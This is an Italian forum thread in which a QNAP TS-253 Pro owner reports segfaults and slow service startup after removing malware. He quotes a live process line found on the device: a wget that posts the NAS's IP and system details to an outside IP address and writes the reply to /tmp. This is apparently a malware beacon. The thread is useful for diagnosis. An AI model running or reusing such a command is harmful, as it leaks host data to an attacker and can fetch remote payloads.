TS-253 pro: sysRequest.cgi QTS 4.3.4.5097

[mauzil]

Buongiorno a tutto il forum
Mi chiamo Mauro e sono un consulente ITC.
Ho aggiornato a mano da terminale ssh del TS-253 Pro con l'ultimo fw disponibile.
Ho dovuto anche installar a mano e far girare Malware Remover perché sospettavo una infezione e cosi' era.
Al che dopo l'aggiornamento e la disinfezione (ho trovato un malware) il sistema è lento ad avviare i servizi

Virtualization Station
Rete e switch virtuale
CloudLink
Monitor Risorse
QTS SSL Certificate
Centro licenze
Helpdesk
Malware Remover
Cloud Drive Sync

Indagando con dmesg ho verificato che vengono emessi i messagi tipo il seguente. Questo indicato è il primo messaggio emesso.

[ 372.627508] sysRequest.cgi[14841]: segfault at 7ffd6a4a2000 ip 00007f87e8c2f351 sp 00007ffd6a4684c0 error 4 in libuLinux_statistics.so.0.0[7f87e8c2d000+4000]
...
[ 2493.962917] sysRequest.cgi[9897]: segfault at 7fff30fa5008 ip 00007f5677233351 sp 00007fff30f6aeb0 error 4 in libuLinux_statistics.so.0.0[7f5677231000+4000]

E' normale la lentezza dell'avvio o puo' essere legato ai messaggi di cui sopra?
Come posso risolvere l'errore in sysRequest.cgi?

Grazie

[mauzil]

Rieccomi.
Indagando tra i processi attivi ho trovato uno strano processo

/usr/bin/wget --post-data ip=93.55.114.230&unm=Linux NAS 4.2.8 #1 SMP Mon May 28 01:16:29 CST 2018 x86_64 GNU/Linux&unmm=x86_64&umac= -O /tmp/at.ecr http://185.117.75.143:45865

Ucciso questo processo i servizi pendenti si sono avviati

[mauzil]

Ecco la riga esatta che viene mostrata dal comando ps ax

30095 admin 3552 S /usr/bin/wget --post-data ip=93.55.114.230&unm=Linux NAS 4.2.8 #1 SMP Mon May 28 01:16:29 CST 2018 x86_64 GNU/Linux&unmm=x86_64&umac= -O /tmp/crn.edc http://185.117.75.143:45865/AvvKUQQtRv7 ... byMVuy.php

[wozxyz]

Io aprirei un ticket...